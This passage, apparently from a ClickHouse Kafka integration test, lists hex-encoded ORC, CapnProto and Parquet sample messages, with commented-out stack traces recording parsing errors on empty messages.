01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
# 'Parquet' : {
# not working at all with Kafka: DB::Exception: IOError: Invalid Parquet file size is 0 bytes
# /contrib/libcxx/include/exception:129: std::exception::capture() @ 0x15c33fe8 in /usr/bin/clickhouse
# /contrib/libcxx/include/exception:109: std::exception::exception() @ 0x15c33fb5 in /usr/bin/clickhouse
# /contrib/poco/Foundation/src/Exception.cpp:27: Poco::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x21877833 in /usr/bin/clickhouse
# /src/Common/Exception.cpp:37: DB::Exception::Exception(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, int) @ 0x15c2d2a3 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:70: DB::ParquetBlockInputFormat::prepareReader() @ 0x1df2b0c2 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:36: DB::ParquetBlockInputFormat::ParquetBlockInputFormat(DB::ReadBuffer&, DB::Block) @ 0x1df2af8b in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ParquetBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, 0ul, 1ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>, std::__1::__tuple_indices<0ul, 1ul>) @ 0x1df2dc88 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ParquetBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ParquetBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ParquetBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&>) @ 0x1df2d9c8 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ParquetBlockInputFormat, std::__1::allocator<DB::ParquetBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&>(std::__1::allocator<DB::ParquetBlockInputFormat>, DB::ReadBuffer&, DB::Block const&) @ 0x1df2d687 in /usr/bin/clickhouse
# /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ParquetBlockInputFormat>::value), std::__1::shared_ptr<DB::ParquetBlockInputFormat> >::type std::__1::make_shared<DB::ParquetBlockInputFormat, DB::ReadBuffer&, DB::Block const&>(DB::ReadBuffer&, DB::Block const&) @ 0x1df2d455 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ParquetBlockInputFormat.cpp:95: DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1df2cec7 in /usr/bin/clickhouse
# /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ce6a in /usr/bin/clickhouse
# /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2cd7d in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2ccda in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0, std::__1::allocator<DB::registerInputFormatProcessorParquet(DB::FormatFactory&)::$_0>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1df2bdec in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# /src/DataStreams/copyData.cpp:63: DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*) @ 0x1c9e9fc7 in /usr/bin/clickhouse
# /src/Storages/Kafka/StorageKafka.cpp:565: DB::StorageKafka::streamToViews() @ 0x1d8cc3fa in /usr/bin/clickhouse
# # 'data_sample' : [
# # b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\
xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
# # b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x1e\x16\x84\x01\x16\x8c\x01\x26\xb6\x07\x26\x8e\x07\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x8e\x0a\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\xc2\x09\x26\x9a\x09\x1c\x36\x00\x28\x04\x01\x00\x00\x00\